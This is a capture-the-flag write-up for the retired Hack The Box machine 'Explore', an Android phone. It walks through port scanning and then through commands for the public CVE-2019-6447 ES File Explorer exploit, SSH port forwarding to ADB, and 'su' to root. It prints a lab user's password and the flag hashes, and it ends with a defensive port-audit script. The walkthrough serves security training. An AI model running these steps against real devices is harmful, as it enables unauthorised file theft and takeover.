| Name: | Explore |
|---|---|
| Release Date: | 26 Jun 2021 |
| Retire Date: | 30 Oct 2021 |
| OS: | Linux |
| Base Points: | Easy - Retired [0] |
| Rated Difficulty: | |
| Radar Graph: | |
| JoshSH 00 days, 00 hours, 03 mins, 27 seconds | |
| jkr 00 days, 00 hours, 18 mins, 56 seconds | |
| Creator: | bertolis |
| Pentest Workstation PDF: | Explore.pdf |
Again, we start with `sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.10.247`.
Sidenote: newer versions of Kali that do not run as root by default require `sudo` whenever scanning UDP ports.
The major ports we need to look at right now are SSH (TCP 2222), what nmap guesses as FREECIV/ADB (TCP 5555), and what it guesses as HTTP Bukkit JSONAPI (TCP 59777). Gobuster found several pages and directories that could be interesting.
gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.247:59777
┌──(kali㉿kali)-[~/Desktop/HTB/Explore]
└─$ gobuster dir -u http://10.10.10.247:59777 -w /usr/share/dirb/wordlists/big.txt -o gobusterExplore.out
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.247:59777
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/17 08:41:32 Starting gobuster in directory enumeration mode
===============================================================
/acct (Status: 301) [Size: 65] [--> /acct/]
/bin (Status: 301) [Size: 63] [--> /bin/]
/cache (Status: 301) [Size: 67] [--> /cache/]
/config (Status: 301) [Size: 69] [--> /config/]
/d (Status: 301) [Size: 59] [--> /d/]
/data (Status: 301) [Size: 65] [--> /data/]
/dev (Status: 301) [Size: 63] [--> /dev/]
/etc (Status: 301) [Size: 63] [--> /etc/]
/init (Status: 403) [Size: 31]
/lib (Status: 301) [Size: 63] [--> /lib/]
/mnt (Status: 301) [Size: 63] [--> /mnt/]
/oem (Status: 301) [Size: 63] [--> /oem/]
/proc (Status: 301) [Size: 65] [--> /proc/]
/product (Status: 301) [Size: 71] [--> /product/]
/sbin (Status: 301) [Size: 65] [--> /sbin/]
/storage (Status: 301) [Size: 71] [--> /storage/]
/sys (Status: 301) [Size: 63] [--> /sys/]
/system (Status: 301) [Size: 69] [--> /system/]
/vendor (Status: 301) [Size: 69] [--> /vendor/]
===============================================================
2022/01/17 08:56:26 Finished
===============================================================
Researching ports 5555 and 59777 leads to ES File Explorer, its open-port behaviour and its known vulnerability. Two great resources for those two ports are:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6447
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
Clone the exploit repo and check the README.md file to see what commands can be run. To save time, the ones we need are:
python3 poc.py --ip=10.10.10.247 -c listPics
and then
python3 poc.py --ip=10.10.10.247 -g /storage/emulated/0/DCIM/creds.jpg
Open the creds.jpg file and you'll have Kristi's login credentials. Apparently, having a picture of the quintessential "post-it note" is better than just the post-it note... (PASSWORD MANAGERS!!! I'm better now). At least it's a halfway decent password, so there's that.
Kristi:Kr1sT!5h@Rp3xPl0r3!
This is obviously a phone, in case the ES File Explorer wasn't clear :D Now we have to figure out how to escalate to the phone's version of root (which, if I recall, is still root). The problem is that normal Linux enumeration scripts aren't going to work correctly AND we still have to find the user.txt flag. Time to go old school manual. After searching the file system, I found a few things. First, there's an SD card in this phone and the user flag is on it!
:/sdcard $ cat user.txt
f32017174c7c7e8f50c6da52891ae250
Now, if you recall, port 5555 (ADB) was filtered from the outside, but what if we could use SSH port forwarding to reach it through the box itself?
ssh -L 5555:localhost:5555 kristi@10.10.10.247 -p 2222
Then we "should" be able to use adb connect to get another shell, hopefully as root, but we'll see.
┌──(kali㉿kali)-[~/Desktop/HTB/Explore]
└─$ adb connect localhost:5555
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to localhost:5555
┌──(kali㉿kali)-[~/Desktop/HTB/Explore]
└─$ adb devices
List of devices attached
emulator-5554 device
localhost:5555 device
Notice there are two "devices" attached. We need to specify which one we want adb to connect to the shell on.
┌──(kali㉿kali)-[~/Desktop/HTB/Explore]
└─$ adb -s localhost:5555 shell
x86_64:/ $ whoami
shell
x86_64:/ $ su
:/ # whoami
root
Gotcha!!! Now we search for root.txt and this phone will be toast.
:/ # find / -name root.txt
:/data # cat root.txt
f04fc82b6d49b41c9b08982be59338c5
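The two lessons of this box for a defender are that ADB over TCP (5555) and the ES File Explorer HTTP server (59777) are both dangerous listeners, and that filtering them at the edge or binding them to loopback is not enough once anyone holds a valid SSH login, because `ssh -L` reaches them anyway. The audit script below is an added example, not part of the original writeup or the exploit repo: it parses constructed `ss -ltn`-style output (sample embedded inline) and flags those two ports; the port table and the "forwardable over SSH" note are assumptions taken from this walkthrough.

```python
import re

# Assumption (from this walkthrough): the two services the Explore box exposed.
RISKY_PORTS = {
    5555: "ADB over TCP: unauthenticated shell, and bare 'su' gave root on this box",
    59777: "ES File Explorer HTTP server (CVE-2019-6447): unauthenticated file read",
}

# Constructed sample of `ss -ltn` output, not captured from the real box.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     0.0.0.0:2222         0.0.0.0:*
LISTEN  0       50      127.0.0.1:5555       0.0.0.0:*
LISTEN  0       50      0.0.0.0:59777        0.0.0.0:*
LISTEN  0       128     [::]:22              [::]:*
"""

# One LISTEN row: state, queues, then local address and port (IPv4 or [IPv6]).
LINE_RE = re.compile(r"^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+")


def audit_listeners(ss_output: str) -> list[dict]:
    """Return one finding per risky listening socket found in ss output."""
    findings = []
    for line in ss_output.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header line or a non-LISTEN row
        port = int(m.group("port"))
        if port not in RISKY_PORTS:
            continue
        addr = m.group("addr")
        loopback_only = addr in ("127.0.0.1", "[::1]")
        findings.append({
            "port": port,
            "bind": addr,
            "reason": RISKY_PORTS[port],
            "exposed_to_network": not loopback_only,
            # Loopback binding or an edge firewall only raises the bar: any valid
            # SSH login can still reach the port with `ssh -L`, as shown above.
            "reachable_via_ssh_forward": True,
        })
    return findings


if __name__ == "__main__":
    for f in audit_listeners(SAMPLE_SS_OUTPUT):
        print(f"{f['bind']}:{f['port']} exposed={f['exposed_to_network']} -> {f['reason']}")
```

On a real device, feed it the output of `ss -ltn` (or `netstat -ltn` on older images); the fix is to disable ADB over TCP and the ES File Explorer remote service rather than to rely on the bind address.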
This was a completely different style of box/phone/thing... But hey, another one down!